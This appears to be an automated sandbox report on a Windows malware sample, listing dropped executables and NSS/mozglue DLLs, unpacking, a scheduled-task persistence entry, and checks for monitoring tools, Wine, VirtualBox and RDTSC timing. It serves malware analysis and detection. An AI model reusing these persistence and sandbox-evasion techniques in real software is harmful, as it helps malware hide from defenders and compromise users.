Source:	Binary string: mozglue.pdbP source: build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr
Source:	Binary string: freebl3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.10.dr
Source:	Binary string: freebl3.pdbp source: build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.10.dr
Source:	Binary string: nss3.pdb@ source: build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: server.exe, 00000009.00000002.2951247968.000002154A196000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953748985.000002154C190000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953613503.000002154BF96000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949871501.0000021549197000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950026853.0000021549398000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952821135.000002154B394000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951676613.000002154A596000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952244888.000002154AB9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952028567.000002154A99A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953075860.000002154B79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953342918.000002154BB9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950201489.0000021549599000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953481772.000002154BD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951868489.000002154A79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952948313.000002154B59D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950724116.0000021549B90000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950902814.0000021549D9D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953209514.000002154B990000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951426592.000002154A393000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952693189.000002154B198000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950549608.0000021549992000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951082794.0000021549F9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952559231.000002154AF9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952409232.000002154AD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950380023.0000021549795000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: server.exe, 00000009.00000002.2951247968.000002154A196000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953748985.000002154C190000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953613503.000002154BF96000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2949871501.0000021549197000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950026853.0000021549398000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952821135.000002154B394000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951676613.000002154A596000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952244888.000002154AB9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952028567.000002154A99A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953075860.000002154B79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953342918.000002154BB9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950201489.0000021549599000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953481772.000002154BD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951868489.000002154A79F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952948313.000002154B59D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950724116.0000021549B90000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950902814.0000021549D9D000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2953209514.000002154B990000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951426592.000002154A393000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952693189.000002154B198000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950549608.0000021549992000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2951082794.0000021549F9B000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952559231.000002154AF9F000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2952409232.000002154AD9E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000009.00000002.2950380023.0000021549795000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3425240612.000000003B947000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.10.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3410147281.000000002FA6D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.10.dr
Source:	Binary string: nss3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3483048029.000000006C49F000.00000002.00000001.01000000.0000000B.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.10.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3373250365.000000001B8E1000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3366366863.0000000019368000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Unpacked PE file: 0.2.IRqsWvBBMc.exe.140000.0.unpack :EW;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.8f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;erhqbccx:EW;uokpdgqw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Unpacked PE file: 10.2.build_2024-07-25_20-56.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Unpacked PE file: 10.2.build_2024-07-25_20-56.exe.19150000.4.unpack
Source: C:\ProgramData\CFHIIJDBKE.exe	Unpacked PE file: 11.2.CFHIIJDBKE.exe.3350000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Unpacked PE file: 10.2.build_2024-07-25_20-56.exe.400000.1.unpack

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00417A40

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: server[1].exe.7.dr	Static PE information: real checksum: 0x2a4571 should be: 0x29cd71
Source: server.exe.7.dr	Static PE information: real checksum: 0x2a4571 should be: 0x29cd71
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1ea38d should be: 0x1e0dac
Source: IRqsWvBBMc.exe	Static PE information: real checksum: 0x1ea38d should be: 0x1e0dac

Source: IRqsWvBBMc.exe	Static PE information: section name:
Source: IRqsWvBBMc.exe	Static PE information: section name: .idata
Source: IRqsWvBBMc.exe	Static PE information: section name:
Source: IRqsWvBBMc.exe	Static PE information: section name: erhqbccx
Source: IRqsWvBBMc.exe	Static PE information: section name: uokpdgqw
Source: IRqsWvBBMc.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: erhqbccx
Source: axplong.exe.0.dr	Static PE information: section name: uokpdgqw
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: server[1].exe.7.dr	Static PE information: section name: .xdata
Source: server.exe.7.dr	Static PE information: section name: .xdata
Source: freebl3.dll.10.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.10.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.10.dr	Static PE information: section name: .didat
Source: softokn3.dll.10.dr	Static PE information: section name: .00cfg
Source: nss3.dll.10.dr	Static PE information: section name: .00cfg
Source: CFHIIJDBKE.exe.10.dr	Static PE information: section name: .didata
Source: 7847438767[1].exe.10.dr	Static PE information: section name: .didata

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0090D84C push ecx; ret	7_2_0090D85F
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF68311229B pushfq ; iretd	9_2_00007FF6831122AC
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF6831155C0 push BAB381C6h; retf	9_2_00007FF6831155C5
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF683113408 push rax; iretd	9_2_00007FF68311340F
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041CDD5 push ecx; ret	10_2_0041CDE8
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C29B536 push ecx; ret	10_2_6C29B549

Source: IRqsWvBBMc.exe	Static PE information: section name: entropy: 7.978392023788185
Source: IRqsWvBBMc.exe	Static PE information: section name: erhqbccx entropy: 7.954389255607031
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.978392023788185
Source: axplong.exe.0.dr	Static PE information: section name: erhqbccx entropy: 7.954389255607031

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\CFHIIJDBKE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\server[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7847438767[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\CFHIIJDBKE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

10_2_00417A40

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CFHIIJDBKE.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 321290 second address: 3212A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jng 00007F4AE04F888Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337367 second address: 33737D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F4AE0E87EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F4AE0E87EBEh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
